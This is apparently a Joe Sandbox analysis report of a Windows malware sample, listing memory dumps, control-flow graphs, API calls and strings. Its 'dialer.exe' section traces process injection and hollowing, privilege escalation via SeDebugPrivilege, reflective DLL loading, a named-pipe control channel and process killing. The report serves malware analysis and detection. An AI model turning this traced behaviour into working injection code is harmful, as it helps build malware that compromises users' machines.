                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscatwcscpywcslen
                                                                                • String ID: $0$0$@$@
                                                                                • API String ID: 4263182637-1413854666
                                                                                • Opcode ID: 5276bf0d763aecce4044b8a0aa334820b154247cc0e08a4853e2e0c6a2717ab4
                                                                                • Instruction ID: a1e379d548c1b5b274e88bcde890c4be73a3be02ca59d4cceb38fa077b52a87d
                                                                                • Opcode Fuzzy Hash: 5276bf0d763aecce4044b8a0aa334820b154247cc0e08a4853e2e0c6a2717ab4
                                                                                • Instruction Fuzzy Hash: 64B18C2294C6C2C5F721BF14F8457AABBB0FFA1348F900135EA8856AA5DF7DE149CB50

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                                • String ID: 0$X$`
                                                                                • API String ID: 329590056-2527496196
                                                                                • Opcode ID: 71ee53b50f05b73d54b70a4291a2078ad9ed205f255109c0ff1271a7e8a73095
                                                                                • Instruction ID: 9f4c0da3f2d1ebb849236831819a49982a916ff86ac7e1f8a4534dc764df3edf
                                                                                • Opcode Fuzzy Hash: 71ee53b50f05b73d54b70a4291a2078ad9ed205f255109c0ff1271a7e8a73095
                                                                                • Instruction Fuzzy Hash: B1025922A1CBC2C1F720AF15E8047AAABA0FB95794F904235EAAC437E5DF7CD145DB50

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,?,?,00007FF749F4A53C,00007FF749F4A53C,?,?,00007FF749F40000,?,00007FF749F41991), ref: 00007FF749F41C63
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,00007FF749F4A53C,00007FF749F4A53C,?,?,00007FF749F40000,?,00007FF749F41991), ref: 00007FF749F41CC7
                                                                                • memcpy.MSVCRT ref: 00007FF749F41CE0
                                                                                • GetLastError.KERNEL32(?,?,?,?,00007FF749F4A53C,00007FF749F4A53C,?,?,00007FF749F40000,?,00007FF749F41991), ref: 00007FF749F41D23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                • API String ID: 2595394609-2123141913
                                                                                • Opcode ID: fd7043c141b48c2f8dc45758b9b17726dd54453a719bfaaaae8ec8bd39dc55e5
                                                                                • Instruction ID: 9e4cf94f7c8ca5c42cc14b73de2d869f4b66e38287b7bb4a989ae719059feddc
                                                                                • Opcode Fuzzy Hash: fd7043c141b48c2f8dc45758b9b17726dd54453a719bfaaaae8ec8bd39dc55e5
                                                                                • Instruction Fuzzy Hash: 97414D61B8C656C5EB10BF45E884EB9A770EB64BC4F954131DA0E437E1DE3CE585C720

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                • String ID:
                                                                                • API String ID: 3326252324-0
                                                                                • Opcode ID: 65354ea9b0585dd84d45ede92d01b7db4d3564fce7b8bb1dc7d04c74f54e03d1
                                                                                • Instruction ID: 8085ef7941c7c9807d003461f6e58259d56b9833cca41f81f8e94de6608e8567
                                                                                • Opcode Fuzzy Hash: 65354ea9b0585dd84d45ede92d01b7db4d3564fce7b8bb1dc7d04c74f54e03d1
                                                                                • Instruction Fuzzy Hash: 24210621A8DA83C1FB19BF55E940BB4A270BF61B80FE50070DA1D576E4CF2CE9969720

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CCG
                                                                                • API String ID: 0-1584390748
                                                                                • Opcode ID: abd898725b95146b97cfffe4ef96ca9f904c57ff2a7b6e405ab081e945b0e9a1
                                                                                • Instruction ID: 04cbe491f59a6cd96c936cb8caa1d954cc61bb5bcab34498fd83a60e319f48fa
                                                                                • Opcode Fuzzy Hash: abd898725b95146b97cfffe4ef96ca9f904c57ff2a7b6e405ab081e945b0e9a1
                                                                                • Instruction Fuzzy Hash: 32219C25F9C126C1FB647E149690F7991A19FB47B4FA48131DE1D433D4DE6CB8838361

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF749F41247), ref: 00007FF749F419F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                • API String ID: 544645111-395989641
                                                                                • Opcode ID: 13559aeb64fb2ffe53ced46686645c359b0be6a3e885cbb8d1261cf63dbf58fc
                                                                                • Instruction ID: cebcbbc4f4ac4123a814bd03086c2636f6c188427586945bb18c20d1633b573a
                                                                                • Opcode Fuzzy Hash: 13559aeb64fb2ffe53ced46686645c359b0be6a3e885cbb8d1261cf63dbf58fc
                                                                                • Instruction Fuzzy Hash: 4F515B21B4C596D6EB10FF25E840FB8A771AB25BA4F948131DA1D07BD5CE3CE586CB20

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 724 7ff749f41800-7ff749f41810 725 7ff749f41812-7ff749f41822 724->725 726 7ff749f41824 724->726 727 7ff749f4182b-7ff749f41867 call 7ff749f42290 fprintf 725->727 726->727
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
Similarity
• API ID: fprintf
• String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
• API String ID: 383729395-3474627141
• Opcode ID: f07ade259d76a49c7355787ff54cd97fbf92663c2f6a4f79a8a4cc4fe43bc8c2
• Instruction ID: b4704bed93e36289cb7be89a10641205a5d83bb19a04034766ba59019a6a6fba
• Opcode Fuzzy Hash: f07ade259d76a49c7355787ff54cd97fbf92663c2f6a4f79a8a4cc4fe43bc8c2
• Instruction Fuzzy Hash: 2AF0C211F5CA85C2E710FF24A9418B9E371EBA97C1F809231DE4D53691DF2CE1828310

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
Similarity
• API ID: CriticalSection$EnterErrorLastLeaveValue
• String ID:
• API String ID: 682475483-0
• Opcode ID: 85413003506242275302fc94dee06b8c4194a3e3bc5b6f75ffbb971594794f7c
• Instruction ID: 0a076ea735b52c9e815197dd34623f4e7a41b0f7dc0af2e4e3983d20c03849fa
• Opcode Fuzzy Hash: 85413003506242275302fc94dee06b8c4194a3e3bc5b6f75ffbb971594794f7c
• Instruction Fuzzy Hash: 83011625A8DA83C1FB05BF55AD00AB4A270BF64BD0FD50031CA1D03BE4DF2CE9969320

Execution Graph

Execution Coverage: 46.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 40.1%
Total number of Nodes: 227
Total number of Limit Nodes: 24
execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceExA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 CloseHandle 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap HeapAlloc 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 1400020ff 427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 CloseHandle 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpiA 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a CloseHandle 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 497 14000145b 497->474 498 140001478 WaitForSingleObject 497->498 501 140001471 CloseHandle 497->501 500 140001487 GetExitCodeThread 498->500 498->501 500->501 501->474 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 CloseHandle 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

Callgraph

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
Similarity
• API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
• String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
• API String ID: 4177739653-1130149537
• Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
• Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
• Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
• Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
Similarity
• API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
• String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
• API String ID: 2561231171-3753927220
• Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
• Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
• Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
• Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
• String ID:
• API String ID: 4084875642-0
• Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
• Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
• Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
• Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
Similarity
• API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
• String ID:
• API String ID: 3197395349-0
• Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
• Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
• Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
• Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                                                Control-flow Graph

                                                                                APIs
